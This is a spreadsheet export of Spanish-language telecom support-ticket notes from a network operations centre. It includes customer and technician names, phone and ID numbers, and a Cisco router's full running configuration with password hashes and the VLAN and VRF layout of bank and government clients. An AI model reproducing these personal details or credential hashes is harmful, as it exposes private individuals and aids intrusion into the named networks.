CC: GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
ASUNTO: SOLICITUD DE PERMISOS | 349400044T | DOLLARCITY GUATEMALA S.A.
  BUENA TARDE ESTIMADO CLIENTE, UN GUSTO SALUDARLE.
CON RESPECTO AL SERVICIO REPORTADO, SOLICITAMOS DE SU APOYO GESTIONANDO LOS PERMISOS PARA LOS TÉCNICOS QUE SE PRESENTARA EN SITIO, ASÍ  MISMO SOLICITAMOS DE SU APOYO GESTIONANDO EL INGRESO AL CENTRO COMERCIAL DE MIRAFLORES.
DIRECCIÓN:  CALZADA ROOSEVELTH 29-60 ZONA 7, C.C. MEGRACENTRO LOCAL 68
ADJUNTAMOS LOS DATOS DE LOS POSIBLES TÉCNICOS QUE SE PRESENTARA EN SITI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HECTOR MISAEL RAMIREZ CARDONA            710195       2249 23862 0101
QUEDAMOS ATENTOS A SUS COMENTARIOS.
SALUDOS CORDIALES.
ATT</t>
  </si>
  <si>
    <t>-* CARLOS ESCOBAR 50325224444 (CLIENTE) INFORMA QUE AUN NO RECIBE EL CORREO, SE VALIDA QUE LA CUENTA ESTA MAL ESCRITA, SE ENVIA HACIENDO LA CORRECCIÓN,  INFORMA QUE EL TICKET INTERNO ES 1589138, LO ESCALARA CON PERSONAL EN SITIO Y RESPONDERÁ A LA BREVEDAD POSIBLE -*
RE: SOLICITUD DE PERMISOS   |  349400044T  |   DOLLARCITY GUATEMALA S.A.</t>
  </si>
  <si>
    <t>F4606722</t>
  </si>
  <si>
    <t>EN LINEA CON CLIENTE MILDRED PEREZ 50056081 QUIEN APOYA A UBICAR EQUIPO ASMI54L ALARMADO, PROCEDE A REINICIARLO PERO SERVICIO NO RESTABLECE, TAMBIÉN UBICA AETHRA 6044 SIN ALARMAS. SE ABRIRÁ WO PARA LA REVISIÓN. CLIENTE AFIRMA QUE PUEDE ESPERAR AL TÉCNICO A LA HORA QUE LLEGUE
ESTADO ASMI54L
PWR     VERDE
ALM     ROJO
SYNC1 VERDE/ROJO</t>
  </si>
  <si>
    <t>F4606726</t>
  </si>
  <si>
    <t>ENLACE CAÍDO, SE DARÁ SEGUIMIENTO HASTA EL DÍA LUNES A LAS 08:00AM CON CLIENTE PARA DETERMINAR ESTADO DE LOS EQUIPOS Y/O REALIZAR PRUEBAS.</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE PEDRO CUY 54288119 MENCIONA QUE EL INCONVENIENTE ES SOLO CON UNA PC POR LO QUE SE VALIDA QUE A NIVEL DE CLARO EL SERVICIO ESTA OPERATIVO Y ESTABLE
CLIENTE INDICA QUE DARA SEGUIMIENTO CON SU IT
-ID 1001116698</t>
  </si>
  <si>
    <t>F4606738</t>
  </si>
  <si>
    <t>SEÑORITA DE LA RECEPCIÓN NO PUEDE SACAR LLAMADAS, CLIENTE LUIS MORALES VALIDA QUE EL SI PUEDE SACAR LLAMADAS, PROBLEMA CON LA SEÑORITA DE LA RECEPCIÓN.
1001122722
COLA:
NOMBRE: A: 52001303
NÚMERO: 52001303
DURACIÓN: 0:01:07
ESTADO: CONECTADA
DETALLES: 52001303
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: ESVINPAREDES
FECHA Y HORA LOCALES: 20/06/2022 08:40:54</t>
  </si>
  <si>
    <t>F4606741</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE EDUARDO DE LEON 45721156 MENCIONA QUE YA TODO ESTA FUNCIONANDO CORRECTAMENTE
CLIENTE MENCIONA EL CAMBIO DEL EQUIPO, SE LE INDICA QUE SI REQUIERE CAMBIO DE EQUIPO ES CON SU EJECUTIVO
-ID 1001114002</t>
  </si>
  <si>
    <t>F4606813</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE BENJAMIN AL 524421868899 INDICA QUE YA SE ENCUENTRAN AUTORIZADOS LOS PERMISOS PARA EL PERSONAL TECNICO **
-ID 1001107735
**</t>
  </si>
  <si>
    <t>F4606814</t>
  </si>
  <si>
    <t>INFORMA CLIENTE MIGUEL PACHECO 77465369 / 76827780 QUE YA SE RETIRARON DE SUS INSTALACIONES DESDE EL MEDIO DÍA, SOLIITA SE LE LLAME EL LUNES 20/06 A PARTIR DE LAS 8 AM PARA REALIZAR PRUEBAS. ID: 3001987952</t>
  </si>
  <si>
    <t>SE LLAMA AL CLIENTE ALEX CORDOVA 77465369 / 76827780, ATIENDE ALEX CÓRDOVA QUIEN VALIDA QUE EL E1 YA SE ENCUENTR FUNCIONANDO DE MANERA NORMAL. INDICA QUE RESOLVIERON EL INCONVENIENTE DE MANERA INTERNA, AUTORIZA EL CIERRE DEL CASO.
1001156504
COLA:
NOMBRE: A: 0050376827780
NÚMERO: 0050376827780
DURACIÓN: 0:00:53
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: 0050376827780
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 20/06/2022 10:19:48 A. M.</t>
  </si>
  <si>
    <t>F4606819</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6819
ID: CONTR0001526842OC
IDENTIFICADOR DEL CLIENTE: CC_WALMART_CR_TIENDA_3133
UBICADO EN: URBANIZACIÓN BOULEVAR LA GUARDIA
DE ANTEMANO MUY AGRADECIDO POR SU APOYO Y QUEDAMOS AL PENDIENTE DE SUS COMENTARIOS.
SALUDOS.</t>
  </si>
  <si>
    <t>F4606827</t>
  </si>
  <si>
    <t>SE VALIDA CON CLIENTE REBECA GOMEZ 46621657, ATIENDE ESTHEFANIE QUIEN VALIDA EL E1 OPERATIVO. AUTORIZA EL CIERRE DEL CASO. ID: 3001983123</t>
  </si>
  <si>
    <t>F4606846</t>
  </si>
  <si>
    <t>SE ESCALÓ CON RUDY SIPAQUE/FO METRO 58261782 INDICA QUE VERIFICARÁ PARA APOYARNOS, NO LE HABÍAN INFORMADO.</t>
  </si>
  <si>
    <t>CLIENTE AUDENCIO MORAN 42201984 INDICA QUE EL SERVICIO SE ENCUENTRA NUEVAMENTE CAIDO, INDICA QUE EQUIPO HUAWEI SE ENCUENTRA ALARMADO NUEVAMENTE CON LOS EN ROJO, INDICA QUE YA REINICIÓ EL EQUIPO HUAWEI ONT Y EL INCONVENIENTE PERSISTE. SE VERIFICA EL PUERTO GPON Y SE OBSERVA LA FIBRA CAIDA. SOLICITA VISITA TÉCNICA. LLAMADA DESDE VIVO
OFFLINE DUE TO FIBER ISSUES	6	M04_GNCYGTAK_OLT_TIVOLI/0/2/1/6	615800004T_COMERCIALIZADORA AUDEPAZ SA	HWTC	HG8245W5	V5R019C10S105	NORMAL</t>
  </si>
  <si>
    <t>CLIENTE AUDENCIO MORAN 38393721 REALIZA PRUEBAS CON EL E1 Y VALIDA , AUTORIZA EL CIERRE DEL CASO
1001177588
COLA:
NOMBRE: A: 38393721
NÚMERO: 011 50238393721
DURACIÓN: 0:00:44
ESTADO: DESCONECTADO [DESCONEXIÓN REMOTA]
DETALLES: +50238393721
PROCESO ASOCIADO:
SERVIDOR IC: CEN-GT-CIC-02
USUARIO DE IC: SAQITZUNUN.COJTI
FECHA Y HORA LOCALES: 20/06/2022 11:17:54 A. M.</t>
  </si>
  <si>
    <t>F4606892</t>
  </si>
  <si>
    <t>SE LE INFORMA A CILENTE ISAAC JUAREZ 40063018 QUE TEC ESTARÁ EN LAS INSTALACIONES DE 16:00 A 16:15 HORAS, CLIENTE ENTERADO, SE LE BRINDAN LOS DATOS DE TEC MILTON SALAZAR PARA DARLE EL INGRESO. ID DE LLAMADA: 3001979108</t>
  </si>
  <si>
    <t>F4606922</t>
  </si>
  <si>
    <t>NO SE OBSERVA INESTABILIDAD  SE DOCUMENTA</t>
  </si>
  <si>
    <t>***--- CL COMPARTE TRAZA --**  SE NOTIFICA A CNOC VÍA SKYPE
DE: ANTONIO PEREIRA BATISTA JUNIOR [MAILTO:ANTONIO.PJUNIOR.EXT@TELEFONICA.COM]
ENVIADO EL: MARTES, 21 DE JUNIO DE 2022 03:39
PARA: KEVIN OBRIAN GARCIA MALDONADO &lt;KEVIN.GARCIA@CLARO.COM.GT&gt;; JHONNSER JEHONADAS ESCOBAR LUCERO &lt;JHONNSER.ESCOBAR@CLARO.COM.GT&gt;; LUIS OVIDIO NORIEGA LARA &lt;LUIS.NORIEGA@CLARO.COM.GT&gt;; SMC ADVANCED OPERATION AMERICAS BUSINESS SOLUTIONS &lt;SMC.ADVANCEDOPERATION.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;; CLIENTESCORPORATIVOS &lt;CLIENTESCORPORATIVOS@CLARO.COM.GT&gt;
CC: CNOCCA &lt;CNOCCA@CLARO.COM.GT&gt;; GRUPO N1 &lt;N1CLARO@CLARO.COM.GT&gt;; INFINITY ROD INBOX &lt;INCOMING@INFINITY-MAIL.ONBMC.COM&gt;; SMC ADVANCED OPERATION AMERICAS BUSINESS SOLUTIONS &lt;SMC.ADVANCEDOPERATION.AMERICAS.BUSINESSSOLUTIONS@TELEFONICA.COM&gt;
ASUNTO: RE: INC000003773969 / SD1136151
ESTIMADOS BUENOS DIAS,
SIGUE LA TRAZA.
AVIA-GTM-GUA-SDV-01-GUAATO# TRACEROUTE VPN 0 8.8.8.8
TRACEROUTE  8.8.8.8 IN VPN 0
TRACEROUTE TO 8.8.8.8 (8.8.8.8), 30 HOPS MAX, 60 BYTE PACKETS
 1  192.168.58.121 (192.168.58.121)  0.366 MS 192.168.58.125 (192.168.58.125)  0.294 MS IP-GT.190.143.213.113.TELEFONICA-CA.NET (190.143.213.113)  0.508 MS
 2  10.235.42.69 (10.235.42.69)  0.875 MS 10.235.42.73 (10.235.42.73)  1.659 MS 10.145.0.234 (10.145.0.234)  1.116 MS
 3  * * 10.120.26.97 (10.120.26.97)  0.956 MS
 4  * * 10.192.47.117 (10.192.47.117)  5.459 MS
 5  * * *
 6  * * 66.110.72.129 (66.110.72.129)  28.485 MS
 7  * * *
 8  108.170.249.17 (108.170.249.17)  39.533 MS * *
 9  142.250.61.135 (142.250.61.135)  42.002 MS * *
10  8.8.8.8 (8.8.8.8)  41.441 MS * *
SALUDOS,
ANTONIO PEREIRA BATISTA JUNIOR</t>
  </si>
  <si>
    <t>F4606931</t>
  </si>
  <si>
    <t>JAVIER GÓMEZ/CLIENTE INDICA QUE AÚN SIGUE VIENDO CAÍDO; SE LE INFORMA QUE SE VERIFICARÁ DE NUEVO SERVICIO, AVANCES EN UNOS 35/40 MINUTOS.
SE INFORMA DE LO ANTERIOR A GESTIÓN N1 VÍA SKYPE, CLIENTE MOLESTO PIDE SE LE APOYE.</t>
  </si>
  <si>
    <t>F4606940</t>
  </si>
  <si>
    <t>SE ENVIA CORREO DE GESTION DE ACCESOS
RE: CAIDO DATOS ATM PUMA LOMA VERDE, TGU
J
JONATHAN EDUARDO TEZEN MEJIA
PARA:ALVAREZ TOMAS, KENDY FABIOLA &lt;KENDY.ALVAREZ@CLARO.COM.HN&gt;;CLIENTES CORPORATIVOSY 6 MÁS
CC:CNOCCA;SOPORTE N1 CNOC &lt;SOPORTEN1.CNOC@CLARO.COM.GT&gt;
SÁB 18/06/2022 18:39
BUENA  TARDE  ESTIMADO CLIENTE
SOLICITANDO DE SU AMABLE APOYO  CON GESTIONAR ACCESOS A NUESTRA AREA TECNICA
TECNICOS:
CESAR FLORES 0826.1991.00164
JULIO MENDOZA 0801.1987.19060
RUBEN ALFREDO VASQUEZ MARADIAGA 0801-1990-16905
JOXE LUIS VARELA RUBÍ 0801-1993-08148
EN ESPERA DE SU RESPUESTA</t>
  </si>
  <si>
    <t>F4606951</t>
  </si>
  <si>
    <t>SE PROCEDE APERTURA DE WO A ING HN ADICIONAL PERSONAL DE NIVEL2 INDICA QUE TIENEN CONOCIMIENTO QUE PERSONAL DE ING ENVIARIA PERSONAL EL DIA DE HOY A LAS  11 AM-</t>
  </si>
  <si>
    <t>F4606963</t>
  </si>
  <si>
    <t>SE INFORMA A CNOC CLARO VÍA SKYPE QUE SE ASOCIA SD1136322 A TICKET F4606963</t>
  </si>
  <si>
    <t>F4606972</t>
  </si>
  <si>
    <t>SE TIENE EN LÍNEA A JEIMI MOREIRA/CLIENTE 49530679 INDICA QUE ENLACE OK, PERO INDICAN QUE LE HABÍAN DICHO QUE DE PARTE DE LA CENTRAL QUEDARON EN HACERLE LA REVISIÓN DE LOS UPS, CASO CONTRARIO ENVIARÍAN TÉCNICO INTERNO. ELLOS SE RETIRAN A LAS 20:00 HORAS, PERO SI FUERA NECESARIO COORDINAR VISITA TÉCNICA SERÍA PARA MAÑANA A LAS 08:00AM</t>
  </si>
  <si>
    <t>F4606986</t>
  </si>
  <si>
    <t>SE RECIBE CORREO DE CLIENTE AUTORIZANDO EL CIERRE DEL TICKET, SE PROCEDE:
DE: GARCIA SANCHEZ E SERGIO IVANHOE [MAILTO:SGSANCHE@UNINET.COM.MX]
ENVIADO EL: SÁBADO, 18 DE JUNIO DE 2022 17:28
ASUNTO: RE: SOLICITUD DE SOPORTE ::: ID LOCAL 30900009T ::: TICKET CNOC IMKEC000108 ::: LINK DOWN
ESTIMADOS, GRACIAS POR SU APOYO.
FAVOR DE PROCEDER CON EL CIERRE DE ESTE CASO.</t>
  </si>
  <si>
    <t>F4607002</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE MARIO BOUNGOUR 41281074 MENCIONA QUE ESTA DANDO SEGUIMIENTO CON SU EJECUTIVO POR LO QUE SOLICITA LLAMADA EN 1 HORA
-ID 1001245400</t>
  </si>
  <si>
    <t>CLIENTE INDICA QUE ESTARA REALIZANDO PRUEBAS SOLICITA LLAMADA A LAS 14:00 HORAS PARA VALIDAR LOS RESULTADOS DE LAS PRUEBAS A REALIZAR-</t>
  </si>
  <si>
    <t>SE LLAMA A CLIENTE  MARIO BOUNGOUR 41281074 MENCIONA QUE ESTAN REALIZANDO CONFIRGURACIONES CON SU EJECUTIVO POR LO QUE SOLICITA LLAMADA PARA EL MIERCOLES A LAS 12:00 HRS
-ID 1001275229</t>
  </si>
  <si>
    <t>**SE LLAMA A CLIENTE DE LA CENTRAL NELSON 46843775  INDICA QUE  QUIERE VER SI HAY ALGUNA LIMITACION QUE ESTE LIMITANDO LA SUBIDA YA QUE AUN NO ESTA SIMETRICO EN LA RED WIFI || SE CONTACTA A GESTOR Y SE DEJA EN LINEA CON CLIENTE **
-ID 1001142768
**</t>
  </si>
  <si>
    <t>*SE LLAMA AL CLIENTE DE LA CENTRAL NELSON 46843775 INDICA QUE AUN NO ESTA SIMETRICO EN LA RED WIFI QUE LAS MEDICIONES LE SIGUEN SALIENDO IGUAL SOLICITA QUE SE LE LLAME A PARTIR DE LAS 9:30 AM PARA VERIFICAR EN CONJUNTO **
-ID 1001108538
**</t>
  </si>
  <si>
    <t>F4607016</t>
  </si>
  <si>
    <t>A NIVEL DE CLARO ENLACE OK, CLIENTE EN SU MOMENTO SATURA SERVICIO; SE LLAMÓ A ÉSTE 56941273 PARA SEGUIMIENTO Y/O VALIDAR SERVICIO, NO CONTESTA; SE DEBE INTENTAR MÁS TARDE O BIEN HASTA EL DÍA LUNES A LAS 08:00AM.</t>
  </si>
  <si>
    <t>F4607050</t>
  </si>
  <si>
    <t>SE REVISA Y SE ENCUENTRA OPERATIVO POR PARTE SIN PERDIDAS VALIDAR EN HORARIO HABIL
SE TIENE COMUNICACIÓN AL ROUTER CPE | ENLACE OPERATIVO.
ROUTER CPE ACTIVO HACE 1 AÑO.
CISCO IOS SOFTWARE, ME340X SOFTWARE (ME340X-METROIPACCESSK9-M), VERSION 12.2(60)EZ6, RELEASE SOFTWARE (FC1)
TECHNICAL SUPPORT: HTTP://WWW.CISCO.COM/TECHSUPPORT
COPYRIGHT (C) 1986-2014 BY CISCO SYSTEMS, INC.
COMPILED WED 29-OCT-14 05:14 BY PROD_REL_TEAM
ROM: BOOTSTRAP PROGRAM IS ME340X BOOT LOADER
BOOTLDR: ME340X BOOT LOADER (ME340X-HBOOT-M) VERSION 12.2(44R)EY, RELEASE SOFTWARE (FC1)
CC_UFINET_GT_Z10_EDIF_GUAYACAN UPTIME IS 1 YEAR, 16 WEEKS, 3 DAYS, 4 HOURS, 20 MINUTES
SYSTEM RETURNED TO ROM BY POWER-ON
SYSTEM RESTARTED AT 01:24:18 UTC THU FEB 25 2021
SYSTEM IMAGE FILE IS "FLASH:/ME340X-METROIPACCESSK9-MZ.122-60.EZ6.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ME-3400EG-12CS-M (POWERPC405) PROCESSOR (REVISION G0) WITH 131072K BYTES OF MEMORY.
PROCESSOR BOARD ID FCW2137H1KZ
LAST RESET FROM POWER-ON
52 VIRTUAL ETHERNET INTERFACES
1 FASTETHERNET INTERFACE
16 GIGABIT ETHERNET INTERFACES
THE PASSWORD-RECOVERY MECHANISM IS ENABLED.
512K BYTES OF FLASH-SIMULATED NON-VOLATILE CONFIGURATION MEMORY.
BASE ETHERNET MAC ADDRESS       : 70:1F:53:1E:E1:80
MOTHERBOARD ASSEMBLY NUMBER     : 73-15374-02
MOTHERBOARD SERIAL NUMBER       : FOC2130P5G8
MODEL REVISION NUMBER           : G0
MOTHERBOARD REVISION NUMBER     : A0
MODEL NUMBER                    : ME-3400EG-12CS-M
SYSTEM SERIAL NUMBER            : FCW2137H1KZ
TOP ASSEMBLY PART NUMBER        : 800-39895-01
TOP ASSEMBLY REVISION NUMBER    : D0
VERSION ID                      : V04
CLEI CODE NUMBER                : COMBU00BRB
HARDWARE BOARD REVISION NUMBER  : 0X03
SWITCH PORTS MODEL              SW VERSION            SW IMAGE
------ ----- -----              ----------            ----------
*    1 16    ME-3400EG-12CS-M   12.2(60)EZ6           ME340X-METROIPACCESSK9-M
CONFIGURATION REGISTER IS 0XF
CC_UFINET_GT_Z10_EDIF_GUAYACAN#
CONFIGURACION DEL CPE:
SHOW RUNN
BUILDING CONFIGURATION...
CURRENT CONFIGURATION : 29205 BYTES
!
! LAST CONFIGURATION CHANGE AT 13:38:43 UTC TUE JUN 14 2022 BY GESTIONIP
! NVRAM CONFIG LAST UPDATED AT 13:38:43 UTC TUE JUN 14 2022 BY GESTIONIP
!
VERSION 12.2
NO SERVICE PAD
SERVICE TIMESTAMPS DEBUG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE TIMESTAMPS LOG DATETIME MSEC LOCALTIME SHOW-TIMEZONE
SERVICE PASSWORD-ENCRYPTION
!
HOSTNAME CC_UFINET_GT_Z10_EDIF_GUAYACAN
!
BOOT-START-MARKER
BOOT-END-MARKER
!
!
ENABLE SECRET 5 $1$D9AB$IHBOKOAGLPPXZLWAHHOOO1
!
USERNAME GESTIONIP SECRET 5 $1$KYYH$JLOJW8WJ7IVU.LFMONVCK.
NO AAA NEW-MODEL
SYSTEM MTU ROUTING 1500
AUTHENTICATION MAC-MOVE PERMIT
IP ROUTING
NO IP DOMAIN-LOOKUP
!
IP VRF APNFENOSA
 DESCRIPTION 302500144
 RD 6458:5940
 ROUTE-TARGET EXPORT 6458:5940
 ROUTE-TARGET IMPORT 6458:5940
!
IP VRF APNFENOSA_V2
 DESCRIPTION 399300009
 RD 6458:17220
 ROUTE-TARGET EXPORT 6458:17220
 ROUTE-TARGET IMPORT 6458:17220
!
IP VRF AVON_PANAMA
 DESCRIPTION 39300027
 RD 6458:16040
 ROUTE-TARGET EXPORT 6458:16040
 ROUTE-TARGET IMPORT 6458:16040
!
IP VRF BANRURAL
 DESCRIPTION 8900212
 RD 6458:1110
!
IP VRF BI_INTERNACIONALES
 DESCRIPTION 7900152
 RD 6458:13140
 ROUTE-TARGET EXPORT 6458:13140
 ROUTE-TARGET IMPORT 6458:13140
!
IP VRF BI_PANAMA
 DESCRIPTION 7900159
 RD 6458:15180
 ROUTE-TARGET EXPORT 6458:15180
 ROUTE-TARGET IMPORT 6458:15180
!
IP VRF DATOS_BANTRAB2
 DESCRIPTION DATOS_BANTRAB2
 RD 6458:2390
!
IP VRF DATOS_INNOVA
 DESCRIPTION DATOS_INNOVA
 RD 6458:200690
!
IP VRF DATOS_WALMART
 DESCRIPTION DATOS_WALMART
 RD 6458:7040
!
IP VRF ENVASES_GT_PANAMA
 DESCRIPTION 440400005
 RD 6458:14270
 ROUTE-TARGET EXPORT 6458:14270
 ROUTE-TARGET IMPORT 6458:14270
!
IP VRF GESTION_UFINET
 DESCRIPTION GESTION_UFINET
 RD 6458:16660
 ROUTE-TARGET EXPORT 6458:16660
 ROUTE-TARGET IMPORT 6458:16660
!
IP VRF INTECAP_DATOS
 DESCRIPTION INTECAP_DATOS
 RD 6458:18460
!
IP VRF INTERNETS_UFINET
 DESCRIPTION INTERNETS_UFINET
 RD 6458:11270
!
IP VRF IP_PBX_ACCESOS
 DESCRIPTION IP_PBX_ACCESOS
 RD 6458:11840
!
IP VRF MP_TELEF
 DESCRIPTION MP_TELEF
 RD 6458:18180
!
!
IP DHCP POOL ALIMENTOS
   VRF DALIMENTOSIDEAL
   NETWORK 192.168.1.0 255.255.255.0
   DNS-SERVER 192.168.125.12 192.2.1.2
   DEFAULT-ROUTER 192.168.1.11
   LEASE 30
!
!
!
CRYPTO PKI TRUSTPOINT TP-SELF-SIGNED-1394532736
 ENROLLMENT SELFSIGNED
 SUBJECT-NAME CN=IOS-SELF-SIGNED-CERTIFICATE-1394532736
 REVOCATION-CHECK NONE
 RSAKEYPAIR TP-SELF-SIGNED-1394532736
!
!
CRYPTO PKI CERTIFICATE CHAIN TP-SELF-SIGNED-1394532736
 CERTIFICATE SELF-SIGNED 01
  30820256 308201BF A0030201 02020101 300D0609 2A864886 F70D0101 04050030
  31312F30 2D060355 04031326 494F532D 53656C66 2D536967 6E65642D 43657274
  69666963 6174652D 31333934 35333237 3336301E 170D3933 30333031 30303031
  31335A17 0D323030 31303130 30303030 305A3031 312F302D 06035504 03132649
  4F532D53 656C662D 5369676E 65642D43 65727469 66696361 74652D31 33393435
  33323733 3630819F 300D0609 2A864886 F70D0101 01050003 818D0030 81890281
  8100B90F 4041730B 0C1AAB67 8327118B 39036CBF BE08528B 3B1CDA69 6EAED1DD
  46987F7D 30DB34FB E24EFEFA 3FA9463C 59B46650 8F24806F 9D6AF6C3 41F792FD
  9B452C44 9E82DE9E 99180C67 6431F912 5525B586 950058B0 E1A8E30B 464D06DD
  296459AA E0F6F9D9 1CC26E2F 17B34DFF E9F646A4 A32E3351 28F81C61 C7E6692F
  23410203 010001A3 7E307C30 0F060355 1D130101 FF040530 030101FF 30290603
  551D1104 22302082 1E43435F 5546494E 45545F47 545F5A31 305F4544 49465F47
  55415941 43414E30 1F060355 1D230418 30168014 3202B0DD 1B874B7A E2F80575
  F5826DED 4BB146F2 301D0603 551D0E04 16041432 02B0DD1B 874B7AE2 F80575F5
  826DED4B B146F230 0D06092A 864886F7 0D010104 05000381 8100B354 7A9E18B1
  FD5F86C2 CBDC63F7 5FC89AC9 ADFC264D D05961EE 7AF30E45 D3092FEA FD74AA3A
  24EFBF94 97C41730 F2675189 A673CF46 88491C7E 512A50A1 EABF61A2 31BA5DF4
  16A8421D E2DB2D3E 2CA88C75 ABB5A2FE F68DC38F E92E6BDC C685B6F4 F36D4B19
  81DFBD5B 9027F3C7 0966E0D4 1E2108B6 7E576035 A1E3E67E 86FC
  	QUIT
!
!
!
!
SPANNING-TREE MODE RAPID-PVST
SPANNING-TREE EXTEND SYSTEM-ID
!
!
VLAN INTERNAL ALLOCATION POLICY ASCENDING
!
VLAN 10
 NAME APN_FENOSA_V2
!
VLAN 119
 NAME GESTION_UFINET
!
VLAN 184
!
VLAN 189
 NAME GESTION
!
VLAN 210
!
VLAN 314
 NAME DATOS_BANTRAB2_TIV
!
VLAN 378
 NAME ENVASES_UNIVERSALES_PANAMA
!
VLAN 568
 NAME INTERNET_UFINET_TO_TIV
!
VLAN 1462
 NAME DALIMENTOSIDEAL
!
VLAN 1585
 NAME BI_PANAMA
!
VLAN 1752
 NAME APNFENOSA
!
VLAN 1795
 NAME DATOS_WALMART_TO_TIV
!
VLAN 2218
!
VLAN 2250
 NAME DATOS_MP_910400021
!
VLAN 2358
 NAME INNOVA_DATOS
!
VLAN 2378
 NAME APNFENOSA_V2
!
VLAN 2500
 NAME LAN_BI_PANAMA
!
VLAN 2501
 NAME LAN_ENVASES_PANAMA
!
VLAN 2502
 NAME LAN_BI_INTERNACIONALES
!
VLAN 2503
 NAME LAN_DALIMENTOSIDEAL
!
VLAN 2504
 NAME LAN_APNFENOSA
!
VLAN 2510
 NAME INNOVA_863400336T
!
VLAN 2513
 NAME DATOS_RENAP_817100061T
!
VLAN 2514
 NAME RENAP_817100051T
!
VLAN 2515
 NAME DATOS_INNOVA_863400251T
!
VLAN 2523
 NAME RENAP_817100064T
!
VLAN 2528
 NAME INNOVA_863400082
!
VLAN 2532
 NAME RENAP_817100057T
!
VLAN 2535
 NAME INTERNET_INTECAP_826900024T
!
VLAN 2536
 NAME DATOS_INTECAP_826900066T
!
VLAN 2537
 NAME WALMART_344400162
!
VLAN 2538
 NAME DATOS_WALMART_344400123T
!
VLAN 2539
 NAME DATOS_WALMART
!
VLAN 2540
 NAME 344400169
!
VLAN 2541
 NAME 344400234
!
VLAN 2542
 NAME DATOS_WALMART_344400186T
!
VLAN 2543
!
VLAN 2545
 NAME DATOS_MP_758500189T
!
VLAN 2546
 NAME INTERNET_FINCA_GUATEMALA_2845000
!
VLAN 2547
 NAME INTERNET_BANRURAL_8902642T
!
VLAN 2548
 NAME INTERNET_BANRURAL_832000061T
!
VLAN 2549
 NAME DATOS_BANRURAL_8900852T
!
VLAN 2550
 NAME DATOS_MP_910400021T
!
VLAN 2551
 NAME DATOS_MP_758500135T
!
VLAN 2552
 NAME DATOS_MP_758500168
!
VLAN 2553
 NAME DATOS_MP_758500211T
!
VLAN 2555
 NAME DATOS_BANTRAB2_42700305T
!
VLAN 2556
 NAME BANTRAB2_42700331T
!
VLAN 2557
 NAME BANTRAB_42700314T
!
VLAN 2558
 NAME BANTRAB_42700320T
!
VLAN 2559
 NAME DATOS_BANTRAB2
!
VLAN 2697
 NAME DATOS_MP_TO_TIV
!
VLAN 2715
 NAME INTECAP_DATOS_TO_TIV
!
VLAN 2760
 NAME AVON_GT_PANAMA
!
VLAN 3737
 NAME AETHRA
!
VLAN 3838
 NAME BI_INTERNACIONALES
!
IP TFTP SOURCE-INTERFACE VLAN119
!
CLASS-MAP MATCH-ALL SERVICIOS_10MB
!
POLICY-MAP SERVICIOS_10MB
 CLASS CLASS-DEFAULT
    POLICE CIR 10240000 BC 100000 BE 100000
      CONFORM-ACTION TRANSMIT
      EXCEED-ACTION DROP
!
!
!
!
INTERFACE LOOPBACK5
 DESCRIPTION MONITOREO CLARO
 IP VRF FORWARDING BI_PANAMA
 IP ADDRESS 10.212.140.65 255.255.255.255
!
INTERFACE LOOPBACK6
 DESCRIPTION MONITOREO CLARO
 IP VRF FORWARDING APNFENOSA
 IP ADDRESS 10.212.137.32 255.255.255.255
!
INTERFACE LOOPBACK7
 DESCRIPTION MONITOREO DEL CNOC
 IP VRF FORWARDING GESTION_UFINET
 IP ADDRESS 10.212.129.143 255.255.255.255
!
INTERFACE FASTETHERNET0
 NO IP ADDRESS
 NO IP ROUTE-CACHE
 NO IP MROUTE-CACHE
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/1
 DESCRIPTION CAPA 2 HACIA LAN DEL CLIENTE
 SWITCHPORT TRUNK ALLOWED VLAN 2358,2500-2504,2510,2512-2515,2517,2523,2528
 SWITCHPORT TRUNK ALLOWED VLAN ADD 2529,2532,2534-2553,2555-2559,2715,3838
 SWITCHPORT MODE TRUNK
 LOAD-INTERVAL 30
!
INTERFACE GIGABITETHERNET0/2
 DESCRIPTION ACCESO EMPRESARIAL ID90001909337
 SWITCHPORT ACCESS VLAN 3737
!
INTERFACE GIGABITETHERNET0/3
 DESCRIPTION CAPA 2 HACIA LAN DEL CLIENTE
 SWITCHPORT TRUNK ALLOWED VLAN 10
 SWITCHPORT MODE TRUNK
!
INTERFACE GIGABITETHERNET0/4
 DESCRIPTION HACIA ALIMENTOS IDEAL 53600048 (**MIGRADO 07-12-17**)
 SWITCHPORT ACCESS VLAN 1462
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/5
 SWITCHPORT TRUNK ALLOWED VLAN 1752
 SWITCHPORT MODE TRUNK
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/6
 DESCRIPTION ID7900159 (**MIGRADO 07-12-17**)
 NO SWITCHPORT
 IP ADDRESS 10.203.1.186 255.255.255.252
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/7
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/8
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/9
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/10
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/11
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/12
 PORT-TYPE NNI
 SWITCHPORT TRUNK ALLOWED VLAN 1462,1585,1752,3838
 SWITCHPORT MODE TRUNK
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/13
 PORT-TYPE NNI
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/14
 PORT-TYPE NNI
 SHUTDOWN
!
INTERFACE GIGABITETHERNET0/15
 DESCRIPTION WAN PRINCIPAL/_/399300009T/_/
 PORT-TYPE NNI
 SWITCHPORT TRUNK ALLOWED VLAN 119,184,189,314,378,568,1462,1585,1752,1795,2218
